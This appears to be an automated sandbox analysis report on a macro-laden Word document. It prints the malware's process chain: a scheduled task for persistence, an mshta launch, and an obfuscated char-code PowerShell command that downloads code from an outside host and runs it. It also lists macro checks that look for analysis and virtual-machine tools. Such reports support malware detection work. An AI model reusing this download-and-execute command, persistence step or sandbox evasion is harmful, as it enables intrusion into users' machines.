Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\18#U042f.doc | |
Source: unknown | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 | |
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4 | |
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Roaming\WPFT532.hta | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4 | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq% | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ' | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen - | |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 | |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' | |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq% | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ' | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen - | |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("smss.exe","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","secunia") | Name: KYEPC270 |
